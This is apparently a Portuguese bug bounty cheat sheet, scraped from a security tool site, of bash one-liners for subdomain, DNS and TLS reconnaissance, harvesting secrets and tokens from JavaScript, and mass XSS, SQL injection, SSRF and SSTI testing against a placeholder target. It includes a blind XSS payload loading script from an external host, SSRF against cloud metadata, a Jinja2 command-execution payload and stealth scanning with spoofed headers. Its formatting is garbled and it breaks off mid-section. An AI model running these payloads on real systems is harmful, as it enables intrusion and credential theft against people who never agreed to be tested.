### 💀 Wayback Machine Subdomínios```bash
# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt

💀 Extração do CommonCrawl```bash

☠️ CommonCrawl subdomain extraction

curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's//.*//g' | sort -u | anew commoncrawl_subs.txt

root@kitploit:~
### 💀 Subdomínios do VirusTotal```bash
# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt

💀 Tentativa de DNS Zone Transfer```bash

☠️ Check for zone transfer vulnerability

dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/.$//' | anew zone_transfer.txt

root@kitploit:~
### 💀 Pesquisa Reversa de IP```bash
# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt

💀 BGP/ASN Range Scanner```bash

☠️ Get ASN and scan all IP ranges

whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt

root@kitploit:~
### 💀 Registros PTR do Intervalo de IP```bash
# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt

💀 Tudo-em-Um Mega Oneliner```bash

☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️

(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/*.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's//.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt

root@kitploit:~
### 💀 Subdomínio Permutação/Força Bruta```bash
# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt

💀 Bruteforce de Wordlist DNS com PureDNS```bash

☠️ Fast bruteforce with PureDNS

puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt

root@kitploit:~
### 💀 Coletor de Certificados TLS/SSL```bash
# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt

💀 Favicon Hash -> Shodan```bash

☠️ Find related hosts via favicon hash

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt

root@kitploit:~
### 💀 Descoberta de Subdomínios com Google Dork```bash
# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com

🔐 TLS/SSL Reconhecimento (TLSX)

``` ████████╗██╗ ███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ╚══██╔══╝██║ ██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║ ███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║ ╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██║ ███████╗███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🔐 Inteligência de Certificados TLS/SSL com TLSX 🔐**

🔐 Varredura Básica de Certificado TLS```bash

🔐 Full TLS certificate details extraction

echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt

root@kitploit:~
### 🔐 Descoberta de Subdomínios via SANs```bash
# 🔐 Extract all subdomains from certificate SANs
subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt

🔐 Caçador de Certificados Expirados```bash

🔐 Find hosts with expired SSL certificates

cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt

root@kitploit:~
### 🔐 Detecção de Certificado Autoassinado```bash
# 🔐 Identify self-signed certificates (potential security issue)
cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt

🔐 Enumeração de Versão TLS (TLS Fraco)```bash

🔐 Find hosts with deprecated TLS versions (TLS 1.0/1.1)

cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt

root@kitploit:~
### 🔐 Pipeline de Fingerprinting JARM```bash
# 🔐 JARM fingerprint for server identification and correlation
subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt

🔐 Cadeia de Certificados & Análise do Emissor```bash

🔐 Analyze certificate chain and identify CA

cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt

root@kitploit:~
### 🔐 Escaneamento TLS em Massa com Enumeração de Cifras```bash
# 🔐 Full cipher suite enumeration + TLS version
subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt

🔐 Detecção de Certificado Incompatível```bash

🔐 Find certificates where CN doesn't match the hostname

cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt

root@kitploit:~
### 🔐 Pipeline Definitivo de Reconhecimento TLS```bash
# 🔐 Complete TLS intelligence gathering
subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json

🌐 Inteligência DNS (DNSX)

``` ██████╗ ███╗ ██╗███████╗██╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗ ██╔══██╗████╗ ██║██╔════╝╚██╗██╔╝ ██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║ ██║ ██║██╔██╗ ██║███████╗ ╚███╔╝ ██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║ ██║ ██║██║╚██╗██║╚════██║ ██╔██╗ ██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║ ██████╔╝██║ ╚████║███████║██╔╝ ██╗ ██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║ ╚═════╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝ ``` **🌐 Reconhecimento DNS e Coleta de Inteligência com DNSX 🌐**

🌐 1. Resolução em Massa de DNS + Filtragem de Curinga```bash

🌐 Resolve subdomains and filter out wildcards

subfinder -d target.com -silent | dnsx -silent -a -resp-only -wd target.com | sort -u | anew resolved_ips.txt

root@kitploit:~
### 🌐 2. Enumeração de DNS de Múltiplos Tipos de Registro```bash
# 🌐 Query A, AAAA, CNAME, MX, NS, TXT records simultaneously
echo target.com | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp | tee full_dns_records.txt

🌐 3. Extração de CNAME para Subdomain Takeover```bash

🌐 Find dangling CNAMEs pointing to vulnerable services

subfinder -d target.com -silent | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|herokuapp|github|azure|shopify|fastly|pantheon|zendesk|readme|ghost|surge|bitbucket|wordpress|tumblr)" | anew cname_takeover_candidates.txt

root@kitploit:~
### 🌐 4. DNS Reverso (PTR) em Faixas de IP```bash
# 🌐 Discover hidden hosts via reverse DNS lookups
prips 192.168.1.0/24 | dnsx -silent -ptr -resp-only | anew ptr_discovered_hosts.txt

🌐 5. MX Records para Análise de Segurança de Email```bash

🌐 Extract MX records to identify mail servers and SPF bypass opportunities

cat domains.txt | dnsx -silent -mx -resp | awk '{print $1, $2}' | sort -u | tee mx_records.txt && cat domains.txt | dnsx -silent -txt -resp | grep -i "spf" | anew spf_records.txt

root@kitploit:~
### 🌐 6. Registros NS + Verificação de Transferência de Zona DNS```bash
# 🌐 Enumerate nameservers and check for misconfigured zone transfers
cat domains.txt | dnsx -silent -ns -resp-only | tee nameservers.txt && cat nameservers.txt | xargs -I@ -P10 sh -c 'host -t axfr target.com @ 2>&1 | grep -v "failed\|timed out" && echo "[ZONE TRANSFER] @"' | anew zone_transfers.txt

🌐 7. DNS Brute-force com Resolvedores Personalizados```bash

🌐 Mass DNS brute-force with custom resolver list

cat wordlist.txt | sed 's/$/.target.com/' | dnsx -silent -r resolvers.txt -rl 500 -t 200 -retry 3 -resp-only | anew bruteforced_subs.txt

root@kitploit:~
### 🌐 8. Saída JSON para Análise Avançada```bash
# 🌐 Full DNS recon with JSON output for pipeline integration
subfinder -d target.com -silent | dnsx -silent -a -aaaa -cname -mx -ns -txt -ptr -resp -json | jq -c '{host: .host, a: .a, aaaa: .aaaa, cname: .cname, mx: .mx, ns: .ns, txt: .txt}' | tee dns_full_recon.json

🌐 9. Descoberta de ASN via Correlação DNS + IP```bash

🌐 Resolve domains, extract unique IPs, and identify ASN ownership

subfinder -d target.com -silent | dnsx -silent -a -resp-only | sort -u | tee target_ips.txt | xargs -I{} sh -c 'whois {} 2>/dev/null | grep -iE "(netname|orgname|asn|origin)" | head -5' | anew asn_info.txt

root@kitploit:~
### 🌐 10. Pipeline de Recon DNS Definitivo```bash
# 🌐 Complete DNS intelligence gathering
domain="target.com"; subfinder -d $domain -all -silent | tee subs_$domain.txt | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp -json -o dns_records_$domain.json; cat subs_$domain.txt | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|azure|github)" | anew takeover_$domain.txt; cat dns_records_$domain.json | jq -r '.a[]?' | sort -u | dnsx -silent -ptr -resp-only | anew ptr_$domain.txt; echo "[+] DNS Recon Complete: $(wc -l < subs_$domain.txt) subdomains | $(cat dns_records_$domain.json | wc -l) records"

🎯 Pro Tip: Use resolvedores personalizados para melhor desempenho: dnsx -r resolvers.txt -rl 1000


📜 Reconhecimento JavaScript

Pipeline JS Completo```bash

subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '.js$' | anew js.txt

root@kitploit:~
### Extrair Segredos do JS```bash
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt

LinkFinder em Arquivos JS```bash

cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt

root@kitploit:~
### SecretFinder Varredura em Massa```bash
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt

Extração de Variáveis JS```bash

cat file.js | grep -oE "var\s+\w+\s*=\s*['"][^'"]+['"]" | sort -u

root@kitploit:~
### API Keys do JS```bash
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt

Extrair Todas as URLs de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^"'`\s<>]+)" | sort -u | anew js_urls.txt

root@kitploit:~
### Encontrar Endpoints de API em JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u

Extrair Credenciais Codificadas```bash

cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u

root@kitploit:~
### Extrair AWS Keys de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt

Extrair Chaves da API do Google de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z-_]{35}" | sort -u | anew google_api_keys.txt

root@kitploit:~
### Extrair URLs do Firebase de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt

Extrair S3 Buckets de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+.s3.amazonaws.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+.amazonaws.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt

root@kitploit:~
### Extrair IPs Internos de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt

Extrair Webhooks do Slack a partir de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt

root@kitploit:~
### Extrair GitHub Tokens de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt

Extrair Chaves Privadas de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt

root@kitploit:~
### Extrair Endereços de E-mail de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt

Extrair Subdomínios Ocultos de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+.[a-zA-Z]{2,}" | sed 's|https?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt

root@kitploit:~
### 💀 Extrair GraphQL Endpoints de JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt

💀 Extrair Tokens JWT de Arquivos JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-].eyJ[A-Za-z0-9_-].[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt

root@kitploit:~
### 💀 Encontrar Source Maps do Webpack```bash
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt

💀 Extrair Discord Webhooks de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt

root@kitploit:~
### 💀 Encontrar Rotas de Admin Ocultas em JS```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt

💉 Detecção de XSS

Dalfox Pipeline```bash

cat urls.txt | gf xss | uro | qsreplace '">' | dalfox pipe --silence --skip-bav

root@kitploit:~
### XSS Cego com Callback```bash
cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent

Airixss Fast Scan```bash

echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '">' | airixss -payload "confirm(1)"

root@kitploit:~
### Knoxss API```bash
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"

Detecção de DOM XSS```bash

cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval(|.write()" && echo "--- @ ---"'

root@kitploit:~
### XSS em Massa com Nuclei DAST```bash
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50

Detecção de Parâmetros Refletidos```bash

cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt

root@kitploit:~
### Teste de Polyglot XSS```bash
cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"

🗄️ SQL Injection

SQLMap Mass Scan```bash

cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2

root@kitploit:~
### Detecção Baseada em Erros```bash
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt

Cego Baseado em Tempo```bash

cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt

root@kitploit:~
### Ghauri Scan```bash
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3

Detecção de UNION```bash

cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200

root@kitploit:~
### Detecção Baseada em Booleanos```bash
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt

Injeção NoSQL```bash

cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt

root@kitploit:~
---

## 🌐 SSRF e SSTI

### SSRF com Interactsh```bash
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent

SSRF Parameter Fuzzing```bash

cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"

root@kitploit:~
### SSTI Detecção```bash
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt

SSTI Payload Test```bash

cat urls.txt | qsreplace '${77}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 77 %>' | httpx -silent -mr "49"

root@kitploit:~
### Cadeia SSRF Completa```bash
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent

SSRF com DNS Rebinding```bash

cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent

root@kitploit:~
### Jinja2 SSTI```bash
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent

🕷️ Rastreamento Web

Katana Deep Crawl```bash

katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt

root@kitploit:~
### Gospider Varredura Completa```bash
gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew

Hakrawler com Escopo```bash

echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt

root@kitploit:~
### ParamSpider Descoberta```bash
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt

Waymore URLs Históricas```bash

waymore -i target.com -mode U -oU urls.txt

root@kitploit:~
### Rastrear com Headless Browser```bash
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt

Extrair Formulários```bash

katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt

root@kitploit:~
### 💀 Katana Rastreamento Profundo Multi-Alvo + Parsing de JS```bash
# ☠️ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt

💀 Gospider Recursivo + Sitemap + Robots```bash

☠️ Full crawl with sitemap parsing and robots.txt extraction

gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt

root@kitploit:~
### 💀 Hakrawler + Wayback + GAU Crawler Combinado```bash
# ☠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt

💀 Katana Headless + Preenchimento Automático de Formulários + Captura de Tela```bash

☠️ Headless browser crawl with form interaction and XHR capture

katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt

root@kitploit:~
### 💀 Varredura Completa do Cariddi com Detecção de Segredos```bash
# ☠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt

💀 Pipeline de Crawler de Domínio Paralelo```bash

☠️ Mass parallel crawling with deduplication

cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt

root@kitploit:~
### 💀 Cadeia Katana + Gospider + LinkFinder```bash
# ☠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt

💀 Rastreamento Recursivo + Pipeline de Auto-Scan do Nuclei```bash

☠️ Crawl then auto-scan discovered endpoints for vulnerabilities

katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E ".(php|asp|aspx|jsp|do|action)(?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt

root@kitploit:~
### 💀 Waymore + Katana Historical + Live Merge```bash
# ☠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt

💀 Deduplicação de Saída do Multi-Crawler + Extração de Parâmetros```bash

☠️ Run all crawlers and extract unique parameters

(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt

root@kitploit:~
---

## 🔑 Descoberta de Parâmetros

### X8 Parâmetros Ocultos```bash
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt

Arjun Discovery```bash

arjun -i urls.txt -oT arjun_params.txt --stable

root@kitploit:~
### Brute Force de Parâmetros Personalizados```bash
cat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -ac

Mineração de Parâmetros de JS```bash

cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u

root@kitploit:~
### Teste de Poluição de Parâmetros```bash
cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200

📁 Descoberta de Conteúdo

Ffuf - Força Bruta de Diretórios```bash

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100

root@kitploit:~
### 💀 Fuzzing Recursivo - ffuf Varredura Profunda```bash
# ☠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json

💀 Feroxbuster Varredura Recursiva Completa```bash

☠️ Deep recursive scan with auto-tune and smart filtering

feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt

root@kitploit:~
### 💀 Feroxbuster Recursivo Multi-Alvo```bash
# ☠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o [email protected]

💀 ffuf + Feroxbuster Pipeline (Extensões + Recursão)```bash

☠️ Find directories with ffuf, then deep scan each with feroxbuster

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q

root@kitploit:~
### 💀 Fuzzing Recursivo com Varredura em Massa de Extensões```bash
# ☠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json

💀 Feroxbuster Escaneamento Recursivo Paralelo```bash

☠️ Parallel scan with multiple wordlists and extensions

feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt

root@kitploit:~
### 💀 Feroxbuster Recursivo Silencioso + Cabeçalhos```bash
# ☠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt

💀 Feroxbuster Extrair Links + Recursivo```bash

☠️ Extract links from responses and add to scan queue recursively

feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt

root@kitploit:~
### 💀 Feroxbuster Retomar + Filtrar por Tamanho```bash
# ☠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt

💀 Feroxbuster Descoberta de Endpoints de API```bash

☠️ Recursive API fuzzing with JSON content-type

feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt

root@kitploit:~
### Exposição do Git```bash
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt

Arquivos Sensíveis```bash

cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt

root@kitploit:~
### Arquivos de Backup```bash
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200

API Documentação```bash

cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt

root@kitploit:~
### Vazamento de Código-Fonte```bash
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt

Arquivos de Configuração```bash

cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt

root@kitploit:~
### Arquivos de Banco de Dados```bash
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt

⚡ Varredura Nuclei

Varredura Completa de Template```bash

nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt

root@kitploit:~
### Varredura de CVE```bash
